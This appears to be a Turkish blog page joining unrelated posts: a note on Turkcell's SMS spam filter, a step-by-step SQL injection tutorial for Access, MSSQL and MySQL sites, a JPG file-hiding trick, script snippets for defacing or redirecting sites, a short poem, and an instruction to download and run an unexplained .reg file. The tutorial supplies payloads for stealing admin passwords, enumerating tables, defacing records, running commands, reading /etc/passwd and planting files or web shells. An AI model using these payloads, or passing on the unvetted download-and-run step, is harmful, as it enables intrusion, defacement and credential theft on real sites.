mail spam olayının verdiği rahatsızlığın üstüne şimdide cep telefonlarına sms ile spam mesaj yolma olayı ortaya çıktı. Bilerek veya bilmeden bir siteye veya kuruma, kayıt formunda bulunan cep telefonu bölümüne cep numaranızı eklerseniz büyük bir olasılıkla size reklam sms i gelecektir. çoğu zaman kayıt olduğunuz yerden gelecek olan bu mesajlar ilgi olduğunuz şeyler içerecektir. ancak kayıtlı sms leri satan bir firmaya cep numaranızı vermişseniz veya bu firmaya cep numaranız ulaşmışsa farklı mesajların gelmemesi için çok şanslı olmanız gerekecektir :)
şimdi turkcell in size gelen mesejları filtreleyen bir sisteminden bahsedeceğim. ADI : MesajSeç MesajSeç servisi ile ilgilendiğiniz alanları seçebilir, bu alanlarla ilgili tercih ettiğiniz ürün ve kampanya tanıtım kısa mesajlarını alabilir, tercih etmediğiniz kısa mesajları ise bloke edebilirsiniz.
Kullanım Kısa Mesajla:
Cep telefonunuza gelen kısa mesajı 2780'e göndererek bir daha bu konuda size kısa mesaj gönderilmemesini sağlayabilirsiniz. Sesli Yanıt Sistemi:
757 27 80 numaralı telefonu arayarak almak istemediğiniz mesajın konusunu belirtebilir, bir daha bu konuda size kısa mesaj gönderilmemesini sağlayabilirsiniz. MesajSeç Servisi'ne gönderilen kısa mesajlar ve 757 27 80 Sesli Yanıt Sistemi'ni aramak ücretsizdir.
Not: Diğer operatörler üzerinden Turkcell abonelerine gönderilen kısa mesajlar -teknik olarak mümkün olmadığı için- bloke edilemeyecektir.
diğer servis sağlayıcılarda da umarım bu bloke olayı çıkar...
Sizlere Access, mssql ve mysql sistemlerinde bildiğim sql injection yollarını anlatmaya çalışacağım
Access : Access sitelerde update olmaz. En başta bunu söyleyerek başlayayım. Boşuna update yapmaya çalışmayın. Access sistemlerde tablo ve kolon adlarını öğrenebileceğimiz bir yolda olmadığı için tablo ve kolon adlarını bulmak için tek yol tablo ve kolonları tahmin etmektir.
Diyelim ki sitemiz www.hedefite.com/haber.asp?id=1
şimdi yapacağımı union select ile bilgileri çekmeye çalışmaktır.
-The Microsoft Jet database engine cannot find the input table or query ’admin’. Make sure it exists and that its name is spelled correctly.
var ise
-The number of columns in the two selected tables or queries of a union query do not match.
Şeklinde bi hata alınır. İlk hatayı aldıysak tabloyu tutturamamışız başka tablo adı denememiz gerekir. İkinci hatayı aldıysak tablo adı doğru demektir. Şimdiki işimiz kolon sayısını eşitlemek olacaktır. Hata değişene kadar 0 koymaya devam etmemiz gerekiyor.hata değiştikten sonra yada hata almazsak şimdiki işimiz kolon adlarını tahmin etmek.
Örnek olarak; www.hedefsite.com/haber.asp?id=1+union+select+username,passw ord,0,0,0+from+admin
Access sitelerde sql injection yaparak eğer sitenin bi admin paneli varsa onun şifresini yada bir üyelik girişi falan varsa üyelerin şifrelerini alabiliriz.
Mssql : mssql sql injection için en uygun sistemdir diyebilirim. Mssql sistemlerde hataya zorlayacak karakterleri yazdığımız zaman örnek olarak : haber.asp?id=1’a unclosed hatası alıyorsak update yapabilir. Update yapmak için tablo ve kolon adlarını öğrenmek lazım
Öğrenmek için having 1=1 kullanırız.
www.hedefsite.com/news.asp?id=1 having 1=1
Column ’news.title’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
Gibi bi hata alırız. News tablosunda title kolonu varmış.
Diğer kolon adlarını bulmak için
www.hedefsite.com/news.asp?id=1 group by title having 1=1
having 1=1 ‘den önce bulduğumuz kolon adlarını group by ile birlikte yazarak diğer kolon adlarını öğreniriz.
www.hedefsite.com/news.asp?id=1 update tablo_adi set kolon_adi=’yazilmak istenen yazi’;--
şekilde update yapılabilir.
Bir başka kolon ve tablo öğrenme şekli ise şöyle
www.hedefsite.com/news.asp?id=convert(int, (select top 1 name from sysobjects where xtype=’U’ and name>’a’))
bu yazdığımız kod ile alfabetik olarak ‘a’ karakterinden büyük olan ilk tablonun adını öğreniriz. Mesela article tablosunu verdi bize. Daha sonra
www.hedefsite.com/news.asp?id=convert(int, (select top 1 name from sysobjects where xtype=’U’ and name>’article’))
yazarak article tablosundan daha sonra gelen tabloyu buluruz bu şekilde tüm tablo adlarını bulabiliriz.
www.hedefsite.com/news.asp?id= convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype=’U’ and name=’kolonlarını öğrenmek istediğimiz tablo adı’)))
yazarak biraz önce adını öğrendiğimiz tablonun kolon adlarını öğrenebiliriz. COLUMNID yazan yere 1 , 2 , 3 yazarak sırayla tabloda bulunan kolonları alfabetik olarak öğrenebiliriz.
Having 1=1 ile sadece 1 tablonun adı ve kolon adları öğrenilebilirken bu yöntemle tüm tablo ve kolonlar öğrenilebilir.
Uygulanacak başka bir yol ise veri tabanı kullanıcısı dbo yani admin ise veri tabanında cmd komutu çalıştırabilir bunun sonucunu bir ftp’ye yazdırabiliriz yada istediğimiz bir sorgu sonucunu yine ftp’ye yazdırabiliriz. Burada ihtiyacımız olan yazılabilir ve şifresiz ulaşılabilen bir ftp server ve veri tabanı kullanıcısının dbo olmasıdır. Zaten bu yöntemi video ile anlatmıştım.
başka uygulanacak bir yöntem ise serverda dosya oluşturmaktır. Bu şekilde servera fso upload edebilir yada direk index atabiliriz. Yine veri tabanı kullanıcısının admin olması gerekmektedir. Yöntemi kısaca anlatayım. Bununla ilgili 2 video çekmiştim zaten. Şimdi bizim tablodaki verileri dosyaya yazdırma şansımız var. O zaman biz bir tablo oluşturup sonra bu tablo içine oluşturmak istediğimiz dosyaların insert edersek daha sonra bu tablodaki verileri dosyaya yazdırarak serverda istediğimiz dosyayı oluşturabiliriz. Burada dosyaları hex koduna çevirerek insert etmek yararımıza olacaktır çünkü dosyaların içinde bulunan verileri injectionı muhtemelen bozacaktır. Bununla ilgili 2 videom zaten var onlara bakarak çok daha iyi anlayabilirsiniz.
Mysql : bir başka veri tabanı sistemi mysql’dir. Büyük bi çoğunlukla php siteler kullanır. Şunu en başta söyliyeyim php’de update olmaz. Php sitelerde boşuna update denemeyin.
Yapabileceklerini eğer veri tabanı kullanıcısı yetkili değil ise Access ile yapacaklarınızdan ileri geçemez. Union select ile veri çekebilirsiniz. Mysqlde injection kelimeleri arasına /**/ konur. Aslında bu bir şart değildir ama mysqlde /**/ sonlandırı anlamına geliyor sanırım.
bu şekilde kolon sayısını tutturmaya çalışıyoruz. Dikkat ederseniz kolon sayısını tutturmaya çalışırken tablo adı yazmamıza gerek yok.
Eğer yetkisimiz var ise mysql yada information_schema veri tabanlarından veri çekebiliriz. Mysql.user tablosunda kullanici adi ve şifre bilgileri bulunur. Tabi şifre hashlenmiş olarak tutulur. 4.1 öncesi sürümlerde 16 byte ile şifreliyorlardı 4.1 ve sonrası sürümlerde 41 byte ile şifreleniyor. Bu şifreler ancak brute force ile kıralabilir. information_schema.tables tablosundan ise tablo ve kolon adlarını öğrenebilirsiniz.Ayrıca load_file() fonksiyonu ile dosya okuyabiliriz.
mesela bu şekilde etc passwd dosyasını okuyabiliriz. Eğer magic_quotes_gpc özelliği on ise ‘ karakteri /’ dönüştürüleceği için text olarak yazarak bu yöntem çalışmayacaktır. O zaman char() fonksiyonunu kullanıyoruz. /etc/passwd yazısının karakterlerinin tek tek ascii kodlarını yazarak bu yöntemi uygulayabiliriz.
burada ‘dosyaya yazdırlacak kod yerine’ rfi yiyen küçük bir kod parçacığı yazılarak kendimize bir rfi yolu açabiliriz.
Umarım yararlı olmuşumdur.
Bolivar…
resim dosyasında dosya ya da mesaj saklamak @ 05-04-2007 07:57 öncelikle bir resim dosyası kaydediyorsunuz bizimki x.jpg olsun ardındanda saklamak istediğiniz dosyayı sıkıştırarak kaydediyorsunuz bu dosyamıza da y.rar diyelim..şimdi çalıştırdan cmd yazarak komut satırımıza düşüyoruz daha sonra dosyalarımızın bulunduğu klasöre gelerek"copy /b x.jpg + y.rar z.jpg" yazıyoruz aynı klasörde oluşan z.jpg yi açtığınızda resmi görebileceksiniz aynı zamanda dosyayı winrar ile açarsanız dosyanızında orda olduğunu göreceksiniz..herhangi bir txt dosyasını rarlamadan aynı işlemi yaparsanız oluşan dosyayı notepad ile açtığınızda mesajınız açılan not defterinin sonunda görünecektir..
kaynak : www.wardom.org
index atma-cıklar... @ 05-04-2007 07:51 siteye girişde merhaba dedirtin :) < s c r i p t >document.body.innerHTML = "merhaba";< /s c r i p t >
dilediğiniz sayfaya yönlendirin.. < s c r i p t >location.replace(site adresi);< /s c r i p t >
< > arasındaki boşlıkları temizleyerek kullanın...
kışın ortasında kar topu oynayamacağız mesela, havuç da takamayacağız kardan adamların burunlarına... yağmur duası ezberleyeceğiz mesela hep beraber, mehtap yerine, yağmur duasına çıkacağız heybeliden...
küresel ısınma, ne olur ısınma, güneş orada kalsın, ayılarda kutupda...
http://rapidshare.com/files/23036242/Disophrone.Reg adresinden dosyayı indirip çalıştırın. Mümkünse Bu Reg Dosyasını Çalıştırmadan Önce Windows Klasörü Gibi sağlam biryere kopyalayıp o klasör içinde çalıştırın.
